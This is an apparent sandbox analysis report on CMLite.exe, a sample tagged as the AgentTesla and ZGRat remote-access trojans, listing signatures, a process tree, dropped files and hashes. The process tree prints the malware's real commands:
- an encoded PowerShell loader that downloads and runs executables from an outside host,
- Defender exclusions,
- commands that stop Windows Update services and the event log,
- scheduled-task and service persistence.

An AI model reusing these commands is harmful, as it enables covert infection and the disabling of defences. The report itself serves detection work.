Overview

overview

10

Static

static

1

CMLite.exe

windows7-x64

10

CMLite.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    36s
  • max time network
    40s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-05-2024 12:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CMLite.exe

  • Size

    2.3MB

  • MD5

    616a65eb66de1b0218401d55bc36e8b8

  • SHA1

    3c61c3844590cdffe11218fb8f5bb13a5555d52e

  • SHA256

    35bbb997958723a543c906b2c014da4e73d28b935260a58a46c5c09d2920bb89

  • SHA512

    c77ace0d3a8a9dfb5d18e5099b2afef1ad5bc0add6a947fcf1efc8c32be2f8ccab7405bccc8f7514b4f2a884a4c01969e097bf87e724b60effca333628e03004

  • SSDEEP

    49152:C3Iq8lWFDP5E73BgWmU2p77Qqs10y3SryMqf:CMeDPYCWmn5QfbSryMqf

Score
10/10
agentteslazgratevasionexecutionkeyloggerpersistenceratspywarestealertrojan

Malware Config

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect ZGRat V1 3 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • AgentTesla payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Launches sc.exe 9 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\CMLite.exe
    "C:\Users\Admin\AppData\Local\Temp\CMLite.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3276
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABpAGcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBtAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABzAHcAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcALAAgADwAIwBhAHoAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAdgBqACMAPgAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB6AHAAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQApADwAIwBxAGgAbgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwBjAG0ASAB5AHAAZQByAHMAdQByAHIAbwBnAGEAdABlAHMAYQB2AGUAcwBEAGgAYwBwAC4AZQB4AGUAJwAsACAAPAAjAGYAbQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAawBtAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYgBzAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBtAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcAKQApADwAIwB5AHgAZwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AbQAvAGMAbwBuAGgAbwBzAHQAZwBtAC4AZQB4AGUAJwAsACAAPAAjAGMAcgBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeABzAGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdAB4AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABnAG0ALgBlAHgAZQAnACkAKQA8ACMAeQBqAHAAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBpAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB6AG0AYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQA8ACMAeQBpAGoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBiAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGwAeQBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbQBIAHkAcABlAHIAcwB1AHIAcgBvAGcAYQB0AGUAcwBhAHYAZQBzAEQAaABjAHAALgBlAHgAZQAnACkAPAAjAGcAbQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AdQBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAHEAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AGcAbQAuAGUAeABlACcAKQA8ACMAZwB5AHcAIwA+AA=="
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4820
      • C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe
        "C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe"
        3⤵
        • Executes dropped EXE
        • Enumerates system info in registry
        PID:2120
      • C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe
        "C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1252
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\BridgeChainserverwinDriver\lWPzR1COw6cbe1Bc3dVzDZxdAD6Pz4jxoWgNKIOPHWBjqt3tHIP3Cr.vbe"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3208
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\BridgeChainserverwinDriver\SQvq6Fq.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3832
            • C:\BridgeChainserverwinDriver\cmHypersurrogatesavesDhcp.exe
              "C:\BridgeChainserverwinDriver/cmHypersurrogatesavesDhcp.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2256
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\dllhost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2964
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Media Player\Visualizations\SearchApp.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:1848
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\BridgeChainserverwinDriver\Registry.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:4728
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\images\fontdrvhost.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:3096
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\BridgeChainserverwinDriver\SppExtComObj.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:3772
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\abAk7k85T3.bat"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:384
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  8⤵
                    PID:780
                  • C:\Windows\system32\w32tm.exe
                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    8⤵
                      PID:3268
                    • C:\Program Files (x86)\Internet Explorer\images\fontdrvhost.exe
                      "C:\Program Files (x86)\Internet Explorer\images\fontdrvhost.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4620
          • C:\Users\Admin\AppData\Roaming\conhostgm.exe
            "C:\Users\Admin\AppData\Roaming\conhostgm.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4528
            • C:\Users\Admin\AppData\Roaming\.conhostgm.exe
              "C:\Users\Admin\AppData\Roaming\.conhostgm.exe"
              4⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              PID:3068
              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:4820
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4856
                • C:\Windows\system32\wusa.exe
                  wusa /uninstall /kb:890830 /quiet /norestart
                  6⤵
                    PID:1128
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop UsoSvc
                  5⤵
                  • Launches sc.exe
                  PID:1496
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                  5⤵
                  • Launches sc.exe
                  PID:1708
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop wuauserv
                  5⤵
                  • Launches sc.exe
                  PID:2536
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop bits
                  5⤵
                  • Launches sc.exe
                  PID:3132
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop dosvc
                  5⤵
                  • Launches sc.exe
                  PID:1716
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  5⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:208
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  5⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4452
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  5⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3624
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  5⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1252
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe delete "driverupdate"
                  5⤵
                  • Launches sc.exe
                  PID:3120
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                  5⤵
                  • Launches sc.exe
                  PID:1288
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop eventlog
                  5⤵
                  • Launches sc.exe
                  PID:3184
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe start "driverupdate"
                  5⤵
                  • Launches sc.exe
                  PID:2256
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Sidebar\Gadgets\dllhost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1808
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\dllhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4764
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\Gadgets\dllhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4692
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Media Player\Visualizations\SearchApp.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3180
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\Visualizations\SearchApp.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2536
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Media Player\Visualizations\SearchApp.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1760
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\BridgeChainserverwinDriver\Registry.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3520
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\BridgeChainserverwinDriver\Registry.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3644
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\BridgeChainserverwinDriver\Registry.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4820
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Internet Explorer\images\fontdrvhost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:368
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\images\fontdrvhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4696
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\images\fontdrvhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3636
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\BridgeChainserverwinDriver\SppExtComObj.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2268
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\BridgeChainserverwinDriver\SppExtComObj.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2388
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\BridgeChainserverwinDriver\SppExtComObj.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4940
        • C:\ProgramData\VC_redist.x64.exe
          C:\ProgramData\VC_redist.x64.exe
          1⤵
            PID:1224

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\BridgeChainserverwinDriver\SQvq6Fq.bat
            Filesize

            102B

            MD5

            96b489ae2503e2ab4e18a2b584fad475

            SHA1

            873daaaec0a6978a3f6e9a99bf66dfa388ea8321

            SHA256

            6c5ade02c3d706cf54d5d7e0ce525034179ac3f80866caf615e265737df6f1c1

            SHA512

            9ac4ba04e5bc86aced9fbab34b2564bbd59ff249598a4e4501105ee6a443b0467b2995fdeef49cffd84ca106b6256f21a26e243d4396f0a394c2110b7fe54d52

            Download Submit

          • C:\BridgeChainserverwinDriver\cmHypersurrogatesavesDhcp.exe
            Filesize

            2.0MB

            MD5

            2eea3122b5e1a714d45f7718ce3a25e3

            SHA1

            b6d45f1124bf85fd571e6ea9417104b51d539456

            SHA256

            bb8b517b159e137ba92f0ab246630ff36e20fe350056afa75be751fedd634b55

            SHA512

            13c6eedaf9a582d6c02ad478e24a5ae7d66c1195677e8d42541355807336dba09ce736e4539bfe04ce3b98e40aa52c54f457eda6a8b5fd547b784d7c6c89258e

            Download Submit

          • C:\BridgeChainserverwinDriver\lWPzR1COw6cbe1Bc3dVzDZxdAD6Pz4jxoWgNKIOPHWBjqt3tHIP3Cr.vbe
            Filesize

            211B

            MD5

            d4f337599faff375fa8c61471ad7048c

            SHA1

            7bc11cc1588e072698090393875dcf856b874ba1

            SHA256

            10d502ba0315c5fc07e317116ff1dda94b59fe8f6381d75a319a2c7e0891e07a

            SHA512

            6291806cc91e9162a878973b0b02186869fdbb6457fdbf15d6f7b2e538638b3026b66dc5443c8dde0e79d33483aea18e363e711e788c6dab911678bd19a40899

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            19KB

            MD5

            6c76addc0767e2a0f2830b536eacf01b

            SHA1

            54b98ab53a6049ae5fd8a771472d4c1b65ec635d

            SHA256

            1dd4a2387e0fe82a6f8adda3b67abdccdf2c2a5be02aac8930d5ecc4b711ae69

            SHA512

            c3036d8103d8a3c0ffa2d702fdab3bffba994965c757e69275b11ca0e0963b92513f9021851d2b40999efc478f5b07180c644963eb6f57dc2b935b54e03bdd22

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            948B

            MD5

            a7ce8cefc3f798abe5abd683d0ef26dd

            SHA1

            b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

            SHA256

            5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

            SHA512

            c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe
            Filesize

            977KB

            MD5

            02ea34533272f916fb52990a45917913

            SHA1

            bd68a7c84b7d7a65ab19419ddf6a2a2b44fda0a4

            SHA256

            6dd45a770648da5f5996ac7b28f604493b44f8b1ba7458cf60d3a1ab7cf18590

            SHA512

            352521214ed922b0e3331559d0c6b2af0fc55e4b4077dcf83dbeec08a8f59820c98bbbd795cdd8e2430c835ba7fbb6b19c34572762c7cf6359de05b99ef019a7

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nslmyfie.ls4.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\abAk7k85T3.bat
            Filesize

            239B

            MD5

            1e86a7af79da0399d2c5c0c986a0cfb1

            SHA1

            f01edb4ec8097e158577bbd462e82afa525d53f8

            SHA256

            42f1b02732ad4f797358509c69ea4c009ff4c2574bfa349ab7680ce8c6f59fdb

            SHA512

            ed1df23d163d91e7f1bcdb765e56d1d6e969caa39a06b1180e6b1bce58948abfd70fbfd5e3cacd157f76e2d651942cf62bc6df8bd34190255e7e10cb5a0e398f

            Download Submit

          • C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe
            Filesize

            2.3MB

            MD5

            322944acd00186c743f6ff097c0db0c6

            SHA1

            a330f89db2367088048022b74be3a2cb67853a61

            SHA256

            aed6159dc2a264fd2fb0c0d20d7816c26741e1fcd517b06ed4726a8ff1e32d5a

            SHA512

            bf1a98a40a94ea180c01dd90610ee434fd555592ca2e21078330493cd4f8b1f401ae3a5bdf1c0beb4d2181b135760a66ac2c73881d7611f57ef6ceba4fa3e7e3

            Download Submit

          • C:\Users\Admin\AppData\Roaming\conhostgm.exe
            Filesize

            2.9MB

            MD5

            316fa77cc45d0802155448d648b417b4

            SHA1

            c60be59c3df582030f3bbbf7c93e3f6110a38c82

            SHA256

            dd248b4df3e5b9eac86bbe9fc6f7ef17b0d75738b601267b214a825783d0a2a1

            SHA512

            4f1a4b71bc0d18dd6210c7b55736e2c43cf90f7ed700061a775ceecade3ef2b88c0e122769c5570e5bb2b8453deab6d5ff50ab73ff0fbb1cb9b3475be76c4da9

            Download Submit

          • memory/2120-72-0x0000020C9C470000-0x0000020C9C568000-memory.dmp

            Filesize

            992KB

            Download

          • memory/2120-79-0x0000020CB6C60000-0x0000020CB6E56000-memory.dmp

            Filesize

            2.0MB

            Download

          • memory/2256-116-0x0000000002700000-0x000000000270E000-memory.dmp

            Filesize

            56KB

            Download

          • memory/2256-114-0x0000000000BA0000-0x0000000000BAE000-memory.dmp

            Filesize

            56KB

            Download

          • memory/2256-112-0x0000000002740000-0x0000000002758000-memory.dmp

            Filesize

            96KB

            Download

          • memory/2256-110-0x000000001AF80000-0x000000001AFD0000-memory.dmp

            Filesize

            320KB

            Download

          • memory/2256-109-0x0000000002720000-0x000000000273C000-memory.dmp

            Filesize

            112KB

            Download

          • memory/2256-107-0x0000000000B90000-0x0000000000B9E000-memory.dmp

            Filesize

            56KB

            Download

          • memory/2256-105-0x00000000001B0000-0x00000000003B4000-memory.dmp

            Filesize

            2.0MB

            Download

          • memory/2256-122-0x0000000002770000-0x000000000277C000-memory.dmp

            Filesize

            48KB

            Download

          • memory/2256-118-0x0000000002710000-0x000000000271C000-memory.dmp

            Filesize

            48KB

            Download

          • memory/2256-120-0x0000000002760000-0x000000000276E000-memory.dmp

            Filesize

            56KB

            Download

          • memory/3096-144-0x000002801F9A0000-0x000002801F9C2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/3276-0-0x0000000000400000-0x0000000000DAC000-memory.dmp

            Filesize

            9.7MB

            Download

          • memory/3276-2-0x0000000000400000-0x0000000000DAC000-memory.dmp

            Filesize

            9.7MB

            Download

          • memory/3276-1-0x000000007FA70000-0x000000007FE41000-memory.dmp

            Filesize

            3.8MB

            Download

          • memory/4820-23-0x0000000070870000-0x00000000708BC000-memory.dmp

            Filesize

            304KB

            Download

          • memory/4820-35-0x0000000074A50000-0x0000000075200000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/4820-46-0x0000000007A40000-0x0000000007A48000-memory.dmp

            Filesize

            32KB

            Download

          • memory/4820-47-0x0000000007B60000-0x0000000007B82000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4820-48-0x0000000008A60000-0x0000000009004000-memory.dmp

            Filesize

            5.6MB

            Download

          • memory/4820-44-0x0000000007A10000-0x0000000007A24000-memory.dmp

            Filesize

            80KB

            Download

          • memory/4820-43-0x0000000007A00000-0x0000000007A0E000-memory.dmp

            Filesize

            56KB

            Download

          • memory/4820-42-0x00000000079C0000-0x00000000079D1000-memory.dmp

            Filesize

            68KB

            Download

          • memory/4820-41-0x0000000007A90000-0x0000000007B26000-memory.dmp

            Filesize

            600KB

            Download

          • memory/4820-40-0x0000000007840000-0x000000000784A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/4820-80-0x0000000074A50000-0x0000000075200000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/4820-38-0x0000000007E30000-0x00000000084AA000-memory.dmp

            Filesize

            6.5MB

            Download

          • memory/4820-39-0x0000000005210000-0x000000000522A000-memory.dmp

            Filesize

            104KB

            Download

          • memory/4820-37-0x0000000074A50000-0x0000000075200000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/4820-36-0x0000000074A50000-0x0000000075200000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/4820-45-0x0000000007A50000-0x0000000007A6A000-memory.dmp

            Filesize

            104KB

            Download

          • memory/4820-34-0x0000000007470000-0x0000000007513000-memory.dmp

            Filesize

            652KB

            Download

          • memory/4820-33-0x0000000007450000-0x000000000746E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/4820-22-0x0000000006A50000-0x0000000006A82000-memory.dmp

            Filesize

            200KB

            Download

          • memory/4820-21-0x00000000064B0000-0x00000000064FC000-memory.dmp

            Filesize

            304KB

            Download

          • memory/4820-20-0x0000000006470000-0x000000000648E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/4820-19-0x0000000005E60000-0x00000000061B4000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/4820-9-0x0000000005DF0000-0x0000000005E56000-memory.dmp

            Filesize

            408KB

            Download

